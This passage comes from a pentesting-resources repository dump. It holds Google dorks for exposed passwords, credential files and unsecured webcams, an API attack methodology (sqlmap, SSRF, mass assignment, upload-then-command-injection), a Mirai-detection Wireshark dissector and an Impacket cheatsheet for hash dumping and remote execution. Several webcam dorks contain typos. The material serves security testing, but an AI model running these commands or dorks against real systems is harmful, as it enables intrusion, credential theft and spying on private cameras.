``` 123 | allintext:confidential "internal use only" 124 | allintext:username filetype:log 125 | allintext:password filetype:doc 126 | allintext:email filetype:csv 127 | allintext:credentials filetype:xls 128 | ``` 129 | #### Intext: (Search for occurrences of keywords in text) 130 | ``` 131 | intext:"confidential" site:example.com 132 | intext:"username" site:example.com 133 | intext:"password" site:example.com 134 | intext:"email" site:example.com 135 | intext:"credentials" site:example.com 136 | ``` 137 | #### Allinurl: (Search for occurrences of all keywords in URL) 138 | ``` 139 | allinurl:admin login 140 | allinurl:register user 141 | allinurl:secure access 142 | allinurl:profile edit 143 | allinurl:download file 144 | ``` 145 | #### Intitle: (Search for occurrences of keywords in title) 146 | ``` 147 | intitle:"index of" passwd 148 | intitle:"index of" password 149 | intitle:"index of" config 150 | intitle:"index of" db 151 | intitle:"index of" users 152 | ``` 153 | #### Allintitle: (Search for occurrences of all keywords in title) 154 | ``` 155 | allintitle:confidential report 156 | allintitle:login page 157 | allintitle:user profile 158 | allintitle:register account 159 | allintitle:download file 160 | ``` 161 | #### Link: (Search for external links to pages) 162 | ``` 163 | link:example.com "login" 164 | link:example.com "register" 165 | link:example.com "profile" 166 | link:example.com "admin" 167 | link:example.com "password" 168 | ``` 169 | #### Numrange: (Search for specific numbers in a range) 170 | ``` 171 | numrange:1000-2000 filetype:pdf 172 | numrange:2000-3000 filetype:doc 173 | numrange:3000-4000 filetype:xls 174 | numrange:4000-5000 filetype:txt 175 | numrange:5000-6000 filetype:log 176 | ``` 177 | #### Before/After: (Search within a particular date range for any of these) 178 | ``` 179 | filetype:pdf before:2020-01-01 after:2010-01-01 180 | ``` 181 | #### Allinanchor: (Search for occurrences of all keywords in anchor text) 182 | ``` 183 | allinanchor:admin login 184 | allinanchor:user profile 185 | allinanchor:secure access 186 | allinanchor:download file 187 | allinanchor:register account 188 | ``` 189 | #### Inanchor: (Search for occurrences of keywords in anchor text) 190 | ``` 191 | inanchor:admin login 192 | inanchor:user profile 193 | inanchor:secure access 194 | inanchor:download file 195 | inanchor:register account 196 | ``` 197 | #### Allinpostauthor: (Search for blog posts by specific authors) 198 | ``` 199 | allinpostauthor:"admin" 200 | allinpostauthor:"user" 201 | allinpostauthor:"moderator" 202 | allinpostauthor:"guest" 203 | allinpostauthor:"support" 204 | ``` 205 | #### Inpostauthor: (Search for blog posts by specific authors) 206 | ``` 207 | inpostauthor:"admin" 208 | inpostauthor:"user" 209 | inpostauthor:"moderator" 210 | inpostauthor:"guest" 211 | inpostauthor:"support" 212 | ``` 213 | -------------------------------------------------------------------------------- /resources/OSINT/dorks/Readme.md: -------------------------------------------------------------------------------- 1 | These dorks are for a variety of use cases. Mainly to help organizations identify any potential points of weakness that could lead to exposed data. 2 | 3 | > [!CAUTION] 4 | > ***Disclaimer: The use of these tools is strictly for legal and responsible purposes only. Misuse is not condoned, and any unauthorized access or disclosure of data is against the law.*** 5 | 6 | ### Other Repos 7 | 8 | - [Proviesec / google-dorks](https://github.com/Proviesec/google-dorks) Useful Google Dorks for WebSecurity and Bug Bounty 9 | - [vsec7 dork helper](https://vsec7.github.io/) Dork Helper GUI 10 | 11 | ### External Links 12 | 13 | - [Ayrix.com Dork Generator](https://ayrix.info/dorker/?q=domainnamehere) High utility dork tool, powerful web UI 14 | 15 | - [vti-dorks](https://github.com/Neo23x0/vti-dorks) Awesome VirusTotal Intelligence Search Queries 16 | 17 | 18 | -------------------------------------------------------------------------------- /resources/OSINT/dorks/disclosurePrograms.md: -------------------------------------------------------------------------------- 1 | ``` 2 | responsible disclosure swag r=h:com 3 | responsible disclosure hall of fame 4 | responsible disclosure europe 5 | responsible disclosure white hat 6 | white hat program 7 | bug bounty program 8 | insite:"responsible disclosure" -inurl:com 9 | intext responsible disclosure 10 | site com us responsible disclosure 11 | site .nl responsible disclosure 12 | site responsible disclosure 13 | responsible disclosure:sites 14 | responsible disclosure r=h:nl 15 | responsible disclosure r=h:us 16 | responsible disclosure r=h:eu 17 | responsible disclosure bounty r=h:us 18 | responsible disclosure bounty r=h:nl 19 | responsible disclosure bounty r=h:eu 20 | responsible disclosure swag r=h:nl 21 | responsible disclosure swag r=h:uk 22 | responsible disclosure swag r=h:eu 23 | responsible disclosure reward r=h:nl 24 | responsible disclosure reward r=h:us 25 | responsible disclosure reward r=h:eu 26 | site:*.edu intext:security report vulnerability 27 | site:‪twitter.com‬ bug bounty swag/trust/report-a-vulnerability 28 | inurl:/security.txt "mailto*" -github.com -wikipedia.org -portswigger.net -magento 29 | inurl:"bug bounty" and intext:"INR" and inurl:/security 30 | inurl:"bug bounty" and intext:"$" and inurl:/security 31 | inurl:"bug bounty" and intext:"€" and inurl:/security 32 | intext:bounty inurl:/security 33 | intext:"BugBounty" and intext:"BTC" and intext:"reward" 34 | "If you believe you've found a security vulnerability" 35 | "Submission Form powered by Bugcrowd" -bugcrowd.com 36 | inurl:responsible-disclosure-policy 37 | inurl:/security ext:txt "contact" 38 | responsible disclosure swag r=h:gov 39 | responsible disclosure policy r=h:gov 40 | responsible disclosure reward r=h:gov 41 | responsible disclosure bounty r=h:gov 42 | responsible disclosure program r=h:gov 43 | bug bounty program r=h:gov 44 | inurl:gov responsible disclosure 45 | inurl:gov bug bounty 46 | site:*.gov intext:responsible disclosure 47 | site:*.gov intext:bug bounty 48 | responsible disclosure swag site:*.gov 49 | responsible disclosure reward site:*.gov 50 | responsible disclosure bounty site:*.gov 51 | responsible disclosure program site:*.gov 52 | bug bounty program site:*.gov 53 | responsible disclosure r=h:com 54 | responsible disclosure policy r=h:com 55 | responsible disclosure reward r=h:com 56 | responsible disclosure bounty r=h:com 57 | responsible disclosure program r=h:com 58 | bug bounty program r=h:com 59 | inurl:com responsible disclosure 60 | inurl:com bug bounty 61 | site:*.com intext:responsible disclosure 62 | site:*.com intext:bug bounty 63 | responsible disclosure swag site:*.com 64 | responsible disclosure reward site:*.com 65 | responsible disclosure bounty site:*.com 66 | responsible disclosure program site:*.com 67 | bug bounty program site:*.com 68 | ``` 69 | -------------------------------------------------------------------------------- /resources/OSINT/dorks/webcam-otw.txt: -------------------------------------------------------------------------------- 1 | inurl:"view/index.shtml" 2 | inur1 : "MultiCameraFrame?Mode=Motion" VB Viewer inurl:/viewer/live/ja/live.html intitle: "IP CAMERA Viewer" intext: "setting | Client setting" 3 | intitle: "Device(" AND intext: "Network Camera" AND "language:" AND "Password" 4 | intitle: "webcam 7" inurl: '/gallery .html' 5 | intitle: "Yawcam" inur1:8081 6 | inul: control/camerainfo 7 | intitle: "webcamXP 5" - download inul: "/view/view.shtml?id=" 8 | inul:/view/viewer_index.shtml 9 | intext: "powered by webcamXP 5' 10 | intitle:webcam 7 inur1:8080 -intext: 8080 11 | intitle: "Live View / -AXIS" 12 | inurl:view/view. shtml OR 13 | inurl:view/index/frame.shatml| 14 | intitle: "MJPG Live Demo" | "intext: Select preset position" 15 | allintitle:Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 "Network Camera" 16 | allintitle: Edr1680 remote viewer 17 | allintitle: EverFocus EDSR EDSR400 Applet 18 | allintitle: EDR1600 login | Welcome intitle: "BlueNet Video Viewer" 19 | intitle: "SNC-RZ30" -demo 20 | inurl:cgi-bin/guestimage.html 21 | (intitle: (EyeSpyFX|OptiCamFX) "go to camera")|(inurl:servlet/DetectBrowser) 22 | intitle: "Veo Observer XT" 23 | inurl:shtml|p1|php|htm|asp|aspx|pdf|cfm - 24 | intext: observer 25 | intitle: "iGuard Fingerprint Security System" 26 | (intitle:MOBTIX intitle: PDAS) | 27 | (intitle: MOBOTIX intitle:Seiten) | 28 | (inurl: /pda/index.html +camera) 29 | intitle: "Edr1680 remote viewer" 30 | intitle: "NetCam Live Image" - .edu - . gov - johnny.ihackstuff.com 31 | intitle: "INTELLINET" intitle: "IP Camera Homepage" intitle: "WEBDVR" -inurl:product -inurl: demo 32 | intitle: "Middle frame of Videoconference Management System" ext: htm 33 | intitle: "Live View / - AXIS" I inurl:view/view.shtml 34 | intitle: "AXIS 240 Camera Server" 35 | intext: "server push" -help intitle:"--- VIDEO WEB SERVER ---" 36 | intext: "Video Web Server" "Any time & Any where" username password 37 | intitle: HomeSeer.Web.Control | Home.Status.Events.Log 38 | inurl:camctrl.cgi 39 | intitle: "supervisioncam protocol" 40 | intitle: "active webcam page" 41 | -------------------------------------------------------------------------------- /resources/SDR/Frequency-Ranges.md: -------------------------------------------------------------------------------- 1 | # Common Frequency Ranges 2 | 3 | | Device Type | Frequency Range | 4 | | --- | --- | 5 | | AM Radio | 535 kHz to 1705 kHz | 6 | | FM Radio | 87.5 MHz to 108 MHz | 7 | | Public Safety Radios (e.g. Police Scanners) | VHF: 136 MHz to 174 MHz; UHF: 406 MHz to 470 MHz | 8 | | Satellite Communications | VLF: 3 kHz to 30 kHz; LF: 30 kHz to 300 kHz; MF: 300 kHz to 3 MHz; HF: 3 MHz to 30 MHz; VHF: 30 MHz to 300 MHz; UHF: 300 MHz to 3 GHz | 9 | | Global Positioning System (GPS) | L1 band: 1575.42 MHz; L2 band: 1227.60 MHz | 10 | | Microwave Ovens | 2.45 GHz | 11 | | Remote Controls | Infrared (IR): 38 kHz | 12 | | Wireless Audio | DECT: 1880 MHz to 1900 MHz; Bluetooth: 2.4 GHz | 13 | | RFID Devices | LF: 125 kHz; HF: 13.56 MHz; UHF: 860-960 MHz | 14 | | WLAN Devices | 2.4 GHz band: 2.400-2.4835 GHz; 5 GHz band: 5.150-5.350 GHz, 5.470-5.725 GHz, and 5.725-5.825 GHz | 15 | | Cellular Networks | 2G: 850 MHz or 900 MHz; 3G: 850 MHz, 900 MHz, 1700-2100 MHz, or 1900 MHz; 4G/LTE: 700 MHz, 800 MHz, 900 MHz, 1700-2100 MHz, 1900 MHz, or 2600 MHz | 16 | | BT, Bluetooth Low Energy (BTLE) Devices, Zigbeee etc. | 2.4 GHz | 17 | | Remote Keyless Entry (RKE) | 315 MHz - North America. 433.92 MHz - Europe | 18 | | M1 Cards| 900 MHz | 19 | | Building Automation Systems (BAS) | Sub-GHz: 434 MHz, 868 MHz, 915 MHz; 2.4 GHz; 5.8 GHz | 20 | | Wireless Sensor Networks (WSN) | 433 MHz, 868 MHz, 915 MHz; 2.4 GHz | 21 | | Industrial, Scientific, and Medical (ISM) Applications | 433 MHz, 915 MHz, 2.4 GHz, 5.8 GHz | 22 | | Radio-Frequency Identification (RFID) | LF: 125 kHz; HF: 13.56 MHz; UHF: 860-960 MHz | 23 | | Near Field Communication (NFC) | 13.56 MHz | 24 | -------------------------------------------------------------------------------- /resources/SDR/airspy-flightview.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Script to start/stop Airspy & DJI Flightview. 3 | # Usage: sudo ./airspy-flightview.sh {start|stop} 4 | # start: Start all services and containers. 5 | # stop: Stop all & cleanup 6 | 7 | 8 | SERVICES=("dji-receiver.service" "djizmqtotar1090.service" "zmqtotar1090.service") 9 | COMPOSE_FILES=( 10 | "/usr/src/flightview_gui/docker-compose-airspy-adsb.yml" 11 | "/usr/src/flightview_gui/docker-compose-tar1090.yml" 12 | ) 13 | 14 | stop_services() { 15 | echo "Stopping systemd services..." 16 | for service in "${SERVICES[@]}"; do 17 | sudo systemctl stop "$service" 18 | echo "$service stopped." 19 | done 20 | 21 | echo "Stopping Docker containers..." 22 | docker-compose -f "${COMPOSE_FILES[1]}" down --remove-orphans 23 | docker-compose -f "${COMPOSE_FILES[0]}" down --remove-orphans 24 | } 25 | 26 | start_services() { 27 | for service in "${SERVICES[@]}"; do 28 | if ! systemctl is-active --quiet "$service"; then 29 | echo "$service is not running. Starting it now..." 30 | sudo systemctl start "$service" 31 | else 32 | echo "$service is running." 33 | fi 34 | done 35 | 36 | echo "Starting Docker containers using ${COMPOSE_FILES[0]}..." 37 | docker-compose -f "${COMPOSE_FILES[0]}" up -d 38 | sleep 2 39 | echo "Starting Docker containers using ${COMPOSE_FILES[1]}..." 40 | docker-compose -f "${COMPOSE_FILES[1]}" up -d 41 | } 42 | 43 | case "$1" in 44 | start) 45 | start_services 46 | ;; 47 | stop) 48 | stop_services 49 | ;; 50 | *) 51 | echo "Usage: $0 {start|stop}" 52 | exit 1 53 | esac 54 | -------------------------------------------------------------------------------- /resources/methodology/API-Methodology.md: -------------------------------------------------------------------------------- 1 | ## API Testing Methodology 2 | 3 | 1. [Enumerate](#enumerate) 4 | 2. [Attack Authorization](#attack-authorization) 5 | 3. [Attacking Authentication](#attacking-authentication) 6 | 4. [Injection](#injection) 7 | 5. [Mass Assignment](#mass-assignment) 8 | 6. [Excessive Data Exposure](#excessive-data-exposure) 9 | 7. [SSRF](#ssrf) 10 | 8. [Chaining Vulnerabilities w/Command Injection](#chaining-vulnerabilities-wcommand-injection) 11 | 12 | ### Enumerate 13 | 14 | The process of identifying valid users, servers, network resources, and other entities in the system. 15 | - Use different user ID values to see if you can get access to data you shouldn't be able to: 16 | 17 | ```bash 18 | http://testapi.com/user?id=1 19 | http://testapi.com/user?id=2 20 | http://testapi.com/user?id=3 21 | ``` 22 | 23 | ### Attack Authorization 24 | 25 | Testing the API's authorization checks: 26 | - Try to **access a resource that is supposed to be accessible only to admin users** while authenticated as a normal user: 27 | 28 | ```bash 29 | curl -H "Authorization: Bearer userToken" http://testapi.com/admin 30 | ``` 31 | 32 | ### Attacking Authentication 33 | 34 | Attempt to bypass the API's authentication cookies, tokens etc. 35 | - Use an **expired or invalidated** session token to make requests to the API: 36 | 37 | ```bash 38 | GET /profile 39 | Authorization: Bearer expiredToken 40 | ``` 41 | 42 | ### Injection 43 | 44 | Attempting to inject malicious code or strings into the API's input fields. 45 | - Test for SQL Injection vulnerabilities by sending SQL statements in the request data and observing the API's response: 46 | 47 | ```bash 48 | sqlmap -u "http://testapi.com/user?id=1" 49 | ``` 50 | 51 | ### Mass Assignment 52 | 53 | The vulnerability that occurs when a user is allowed to set all properties of an object, including those that should not be publicly accessible. 54 | 55 | - Try to create a new user with admin privileges by including an "isAdmin" or other properties in the request body: 56 | 57 | ```bash 58 | curl -d "username=user&password=pass&isAdmin=true" -X POST http://testapi.com/register 59 | ``` 60 | 61 | ### Excessive Data Exposure 62 | 63 | Testing the API to see if it reveals more data than necessary. 64 | - For example, a user's profile endpoint might unnecessarily include sensitive information like password hashes or security questions 65 | 66 | ```bash 67 | curl http://testapi.com/user/profile 68 | ``` 69 | 70 | ### SSRF (Server-Side Request Forgery) 71 | 72 | A vulnerability where an attacker can make the server perform requests on their behalf. 73 | - Try to get the server to make a request to an internal-only endpoint that shouldn't be accessible from outside the network: 74 | 75 | ```bash 76 | curl -d "url=http://localhost/admin" -X POST http://testapi.com/ssrf 77 | ``` 78 | 79 | ### Chaining Vulnerabilities w/Command Injection 80 | 81 | Exploiting multiple vulnerabilities in sequence to achieve a greater impact. - First exploit a file upload vulnerability to upload a malicious script, then use a command injection vulnerability to execute that script: 82 | 83 | ```bash 84 | # Upload the script 85 | POST /upload HTTP/1.1 86 | Host: testapi.com 87 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW 88 | Content-Length: ... 89 | 90 | # Try to execute the script 91 | curl -d "command=./uploadedScript.sh" -X POST http://testapi.com/command 92 | ``` 93 | -------------------------------------------------------------------------------- /resources/methodology/ExternalPentest.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /resources/methodology/PhysicalPentest.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /resources/methodology/WebPentest.md: -------------------------------------------------------------------------------- 1 | Init commit 2 | -------------------------------------------------------------------------------- /resources/networking/Subnet-Guide.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/52021c46aa1176fcd188b489ed90117046a94bf3/resources/networking/Subnet-Guide.xlsx -------------------------------------------------------------------------------- /resources/networking/Wireshark-Filters.md: -------------------------------------------------------------------------------- 1 | # Wireshark Filter Cheatsheet 2 | 3 | ### Other Filters 4 | 5 | #### 1. Drone Filter - _DJI, Yuneec, Autel, Skydio, AeroVironment, Shenzhen Hubsan, and Holy Stone by MAC prefix:_ 6 | ``` 7 | (eth.src[0:3] == 34:D2:62) || (eth.src[0:3] == 48:1C:B9) || (eth.src[0:3] == 60:60:1F) || (eth.src[0:3] == E4:7A:2C) || (eth.src[0:3] == E0:B6:F5) || (eth.src[0:3] == 18:D7:93) || (eth.src[0:3] == 38:1D:14) || (eth.src[0:3] == 00:1A:F9) || (eth.src[0:3] == 98:AA:FC) || (eth.src[0:3] == 00:0C:BF) 8 | ``` 9 | 10 | ### Filter List 11 | 12 | | Filter Category | Filter Examples | Description | 13 | | --- | --- | --- | 14 | | Top Filters | ip.adr==10.10.1.1 | Filters traffic based on the provided IP address | 15 | | | ip.adr==192.168.27.0/24 | Filters traffic within the provided subnet | 16 | | | tcp.port==80 | Filters traffic on a specific TCP port | 17 | | | tcp.port in{80,443,8000..8005} | Filters traffic on a range of TCP ports | 18 | | | tcp or dns | Filters all TCP or DNS traffic | 19 | | | eth matches "London" | Filters Ethernet traffic for a specific string | 20 | | | !(arp or stp or lldp or cdp or eth.addr==ff:ff:ff:ff:ff:ff or tcp.port in {4433,80}) | Excludes specific types of traffic based on the provided parameters | 21 | | General Filters | http | Filters all HTTP traffic | 22 | | | dns | Filters all DNS traffic | 23 | | | ip.src==192.168.1.1 | Filters traffic from a specific source IP | 24 | | | ip.dst==192.168.1.2 | Filters traffic to a specific destination IP | 25 | | | ipv6 | Filters all IPv6 traffic | 26 | | | eth.addr==00:11:22:33:44:55 | Filters traffic based on the MAC address | 27 | | TCP Filters | tcp.port==80 | Filters TCP traffic on a specific port | 28 | | | tcp.port in {8000..8005} | Filters TCP traffic on a range of ports | 29 | | | tcp.flags.syn==1 | Filters TCP packets with the SYN flag set | 30 | | | tcp.flags.reset==1 | Filters TCP packets with the RESET flag set | 31 | | Frame Filters | frame.len>=100 | Filters packets based on the frame length | 32 | | | frame contains "example" | Filters packets containing a specific string | 33 | | IP Filters | ip.addr==192.168.1.0/24 | Filters traffic within a specific subnet | 34 | | | ip.addr == ip.src && ip.dst | Filters all conversations between source and destination IPs | 35 | | Exclusion Filters | !arp | Excludes all ARP traffic | 36 | | Novel Filters | http.request.method == "POST" | Filters HTTP POST requests | 37 | | | ssl or tls | Filters all SSL/TLS traffic | 38 | | | ip.addr==192.168.1.1 and http | Filters all HTTP traffic from a specific IP | 39 | | | dns.qry.name contains "example" | Filters DNS queries containing a specific string | 40 | | | tcp.flags.syn==1 and tcp.flags.ack==1 | Filters TCP packets with both the SYN and ACK flags set | 41 | | | icmp | Filters all ICMP traffic | 42 | | | ip.addr==192.168.1.1 and icmp | Filters all ICMP traffic from a specific IP | 43 | | | tcp contains "password" | Filters all TCP packets containing the word "password" | 44 | | | http.cookie contains "sessionid" | Filters all HTTP cookies containing the string "sessionid" | 45 | | | eth.dst == ff:ff:ff:ff:ff:ff | Filters all Ethernet frames with the destination MAC set to broadcast | 46 | | | dns.resp.len > 0 | Filters DNS responses with a length greater than zero | 47 | | | ip.addr != 192.168.1.1 | Excludes all traffic from a specific IP address | 48 | | | tcp.flags.fin==1 and tcp.flags.ack==1 | Filters TCP packets with both the FIN and ACK flags set | 49 | | | http.request.uri contains "/login" | Filters HTTP requests with "/login" in the URI | 50 | | | http.response.code == 200 | Filters HTTP responses with a status code of 200 | 51 | | | tcp.len > 0 | Filters TCP packets with a length greater than zero | 52 | | | ssl.record.version == 0x0303 | Filters SSL records with version TLS 1.2 | 53 | | | http.request or http.response | Filters all HTTP requests and responses | 54 | | | udp.port == 53 | Filters all UDP traffic on port 53 | 55 | | | ip.addr == 192.168.1.1 and (tcp or udp) | Filters all TCP or UDP traffic from a specific IP address | 56 | | | frame.len <= 64 | Filters all frames with a length of 64 bytes or less | 57 | | | ip.ttl <= 64 | Filters all IP packets with a TTL of 64 or less | 58 | | | tcp.window_size == 0 | Filters all TCP packets with a window size of zero | 59 | | | tcp.stream eq 1 | Filters all packets within the same TCP stream | 60 | | | http.host contains "example.com" | Filters all HTTP packets where the host field contains a specific string | 61 | 62 | | Operand | Description | 63 | | --- | --- | 64 | | == | Tests for equality | 65 | | != | Tests for inequality | 66 | | > | Tests for greater than | 67 | | < | Tests for less than | 68 | | >= | Tests for greater than or equal to | 69 | | <= | Tests for less than or equal to | 70 | | && | Logical AND. The expression "A && B" is true if both A and B are true. | 71 | | || | Logical OR. The expression "A || B" is true if either A or B, or both, are true. | 72 | | ! | Logical NOT. The expression "!A" is true if A is false. | 73 | | contains | Checks if the left operand, which must be of type string or byte array, contains the right operand, which must be of type string. | 74 | | matches | Checks if the left operand, which must be of type string or byte array, matches the right operand, which must be a regular expression. | 75 | -------------------------------------------------------------------------------- /resources/networking/detection/Readme.md: -------------------------------------------------------------------------------- 1 | ### Protocol Analysis and Detection Engineering 2 | 3 | - Wireshark dissectors 4 | - Retired scripts & tools 5 | - More to come... 6 | -------------------------------------------------------------------------------- /resources/networking/detection/mirai.lua: -------------------------------------------------------------------------------- 1 | -- Enhanced Mirai Detection Dissector for Wireshark 2 | -- Optimized for detecting Mirai traffic patterns 3 | 4 | Mirai = Proto("MIRAI-CNC", "Mirai CNC Protocol") 5 | 6 | -- Known Mirai characteristics 7 | local MIRAI_PATTERNS = { 8 | TELNET_USER = "^root$", 9 | TELNET_PASS = "^(admin|root|123456|password)$", 10 | HTTP_HEADER = "^Mozilla/5.0 %(compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0%)$", 11 | SCANNER_PATTERN = "^.+:.+$" 12 | } 13 | 14 | -- Known Mirai attack types 15 | local ATTACK_TYPES = { 16 | [0] = "UDP Flood", 17 | [1] = "VSE Flood", 18 | [2] = "DNS Water Torture", 19 | [3] = "SYN Flood", 20 | [4] = "ACK Flood", 21 | [5] = "STOMP Flood", 22 | [6] = "UDP Generic Flood", 23 | [7] = "HTTP Flood", 24 | [8] = "TCP Generic Flood" 25 | } 26 | 27 | -- Field definitions optimized for detection 28 | local f = Mirai.fields 29 | f.magic = ProtoField.uint16("mirai.magic", "Magic Header", base.HEX) 30 | f.length = ProtoField.uint16("mirai.length", "Length", base.DEC) 31 | f.attack_duration = ProtoField.uint32("mirai.attack_duration", "Attack Duration (seconds)", base.DEC) 32 | f.attack_type = ProtoField.uint8("mirai.attack_type", "Attack Type", base.DEC, ATTACK_TYPES) 33 | f.num_targets = ProtoField.uint8("mirai.num_targets", "Number of Targets", base.DEC) 34 | f.target_ip = ProtoField.ipv4("mirai.target_ip", "Target IP") 35 | f.target_port = ProtoField.uint16("mirai.target_port", "Target Port", base.DEC) 36 | f.target_subnet = ProtoField.uint8("mirai.target_subnet", "Target Subnet", base.DEC) 37 | f.payload = ProtoField.bytes("mirai.payload", "Payload") 38 | f.telnet_data = ProtoField.string("mirai.telnet_data", "Telnet Data") 39 | f.scanner_data = ProtoField.string("mirai.scanner_data", "Scanner Data") 40 | 41 | -- Enhanced expert info for detection 42 | local expert = Proto.expert 43 | f.expert_attack = ProtoExpert.new("mirai.attack.expert", "Mirai Attack Detected", 44 | expert.group.SECURITY, expert.severity.WARN) 45 | f.expert_scan = ProtoExpert.new("mirai.scan.expert", "Mirai Scanner Activity", 46 | expert.group.SECURITY, expert.severity.NOTE) 47 | f.expert_cnc = ProtoExpert.new("mirai.cnc.expert", "Potential Mirai CNC Communication", 48 | expert.group.SECURITY, expert.severity.WARN) 49 | f.expert_bot = ProtoExpert.new("mirai.bot.expert", "Potential Mirai Bot Activity", 50 | expert.group.SECURITY, expert.severity.WARN) 51 | f.expert_bruteforce = ProtoExpert.new("mirai.bruteforce.expert", "Possible Mirai Bruteforce Attempt", 52 | expert.group.SECURITY, expert.severity.WARN) 53 | 54 | Mirai.experts = {f.expert_attack, f.expert_scan, f.expert_cnc, f.expert_bot, f.expert_bruteforce} 55 | 56 | -- Detection helper functions 57 | local function detect_telnet_pattern(payload) 58 | if payload then 59 | for line in payload:gmatch("[^\r\n]+") do 60 | if line:match(MIRAI_PATTERNS.TELNET_USER) or line:match(MIRAI_PATTERNS.TELNET_PASS) then 61 | return true 62 | end 63 | end 64 | end 65 | return false 66 | end 67 | 68 | local function detect_scanner_pattern(payload) 69 | if payload and payload:match(MIRAI_PATTERNS.SCANNER_PATTERN) then 70 | return true 71 | end 72 | return false 73 | end 74 | 75 | local function detect_http_pattern(payload) 76 | if payload and payload:match(MIRAI_PATTERNS.HTTP_HEADER) then 77 | return true 78 | end 79 | return false 80 | end 81 | 82 | -- Main dissector function 83 | function Mirai.dissector(buffer, pinfo, tree) 84 | if buffer:len() < 4 then return false end 85 | 86 | local is_mirai = false 87 | local offset = 0 88 | local msg_length = buffer(offset, 2):uint() 89 | 90 | pinfo.cols.protocol = "Mirai CNC" 91 | local subtree = tree:add(Mirai, buffer(), "Mirai Protocol Analysis") 92 | 93 | -- Check for Telnet traffic (port 23) 94 | if pinfo.dst_port == 23 or pinfo.src_port == 23 then 95 | local payload = buffer:string() 96 | if detect_telnet_pattern(payload) then 97 | subtree:add_proto_expert_info(f.expert_bruteforce, "Possible Mirai Telnet Bruteforce") 98 | subtree:add(f.telnet_data, buffer(offset):string()) 99 | is_mirai = true 100 | end 101 | end 102 | 103 | -- Check for scanner activity 104 | if pinfo.dst_port >= 1024 and pinfo.dst_port <= 65535 then 105 | local payload = buffer:string() 106 | if detect_scanner_pattern(payload) then 107 | subtree:add_proto_expert_info(f.expert_scan, "Mirai Scanner Activity Detected") 108 | subtree:add(f.scanner_data, buffer(offset):string()) 109 | is_mirai = true 110 | end 111 | end 112 | 113 | -- Check for CNC communication 114 | if buffer:len() >= msg_length and msg_length >= 8 then 115 | subtree:add(f.length, msg_length) 116 | offset = offset + 2 117 | 118 | -- Attack command analysis 119 | local attack_tree = subtree:add(Mirai, buffer(offset), "Attack Analysis") 120 | local attack_duration = buffer(offset, 4):uint() 121 | attack_tree:add(f.attack_duration, attack_duration) 122 | offset = offset + 4 123 | 124 | local attack_type = buffer(offset, 1):uint() 125 | if ATTACK_TYPES[attack_type] then 126 | attack_tree:add(f.attack_type, attack_type) 127 | attack_tree:add_proto_expert_info(f.expert_attack, 128 | string.format("Mirai %s Attack Detected", ATTACK_TYPES[attack_type])) 129 | is_mirai = true 130 | end 131 | offset = offset + 1 132 | 133 | -- Target analysis 134 | local num_targets = buffer(offset, 1):uint() 135 | if num_targets > 0 and num_targets < 255 then 136 | subtree:add(f.num_targets, num_targets) 137 | offset = offset + 1 138 | 139 | local targets_tree = subtree:add(Mirai, buffer(offset), "Target Analysis") 140 | for i = 1, num_targets do 141 | local target_tree = targets_tree:add(Mirai, buffer(offset, 7), 142 | string.format("Target %d", i)) 143 | target_tree:add(f.target_ip, buffer(offset, 4)) 144 | target_tree:add(f.target_port, buffer(offset + 4, 2)) 145 | target_tree:add(f.target_subnet, buffer(offset + 6, 1)) 146 | offset = offset + 7 147 | end 148 | is_mirai = true 149 | end 150 | 151 | -- Payload analysis 152 | if offset < buffer:len() then 153 | local payload = buffer(offset):string() 154 | subtree:add(f.payload, buffer(offset)) 155 | 156 | if detect_http_pattern(payload) then 157 | subtree:add_proto_expert_info(f.expert_bot, "Mirai Bot HTTP Traffic") 158 | is_mirai = true 159 | end 160 | end 161 | end 162 | 163 | -- Set protocol column if Mirai activity detected 164 | if is_mirai then 165 | pinfo.cols.protocol = "MIRAI" 166 | pinfo.cols.info = "Mirai Botnet Traffic" 167 | return true 168 | end 169 | 170 | return false 171 | end 172 | 173 | -- Register for all relevant ports 174 | local tcp_table = DissectorTable.get("tcp.port") 175 | local udp_table = DissectorTable.get("udp.port") 176 | 177 | -- Known Mirai ports 178 | local ports = { 179 | 23, -- Telnet 180 | 48101, -- CNC 181 | 53, -- DNS 182 | 80, -- HTTP 183 | 443, -- HTTPS 184 | 37810, -- Additional CNC 185 | 5555, -- Common target 186 | 7547, -- Common target 187 | 35105, -- Scanner 188 | 61001 -- Scanner 189 | } 190 | 191 | -- Register for both TCP and UDP 192 | for _, port in ipairs(ports) do 193 | tcp_table:add(port, Mirai) 194 | udp_table:add(port, Mirai) 195 | end 196 | -------------------------------------------------------------------------------- /resources/payload-cheatsheets/impacket-cheatsheet.md: -------------------------------------------------------------------------------- 1 | 2 | ```bash 3 | #Primary Commands 4 | 5 | # Enumerate users in the Active Directory domain 6 | GetADUsers.py -all -dc-ip 10.0.0.1 your-domain.local/your-user:your-password 7 | 8 | # Retrieve users without pre-authentication enabled (AS_REP Roasting) 9 | GetNPUsers.py your-domain.local/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.0.0.1 -format john 10 | 11 | # Dump password hashes from a Windows machine using SMB protocol 12 | secretsdump.py -just-dc your-domain.local/your-user:your-password@10.0.0.2 13 | 14 | # Dump password hashes from a Windows machine using LSASS 15 | secretsdump.py -just-dc-ntlm your-domain.local/your-user:your-password@10.0.0.2 16 | 17 | # Remote execution on a target machine using WMI 18 | wmiexec.py your-domain.local/your-user:your-password@10.0.0.3 19 | 20 | # Remote execution on a target machine using SMB 21 | smbexec.py your-domain.local/your-user:your-password@10.0.0.4 22 | 23 | # Remote execution on a target machine using Task Scheduler 24 | atexec.py your-domain.local/your-user:your-password@10.0.0.5 cmd.exe 25 | 26 | # Remote execution on a target machine using DCOM 27 | dcomexec.py your-domain.local/your-user:your-password@10.0.0.6 cmd.exe 28 | 29 | # Enumerate shares and permissions on a target machine using SMB 30 | smbmap.py -u your-user -p your-password -d your-domain.local -H 10.0.0.7 31 | 32 | # Enumerate and retrieve group policy preferences from a domain controller 33 | gpprefdecrypt.py -s your-domain.local -u your-user -p your-password -d your-domain.local 34 | 35 | # Enumerate and retrieve group policy preferences from an SMB share 36 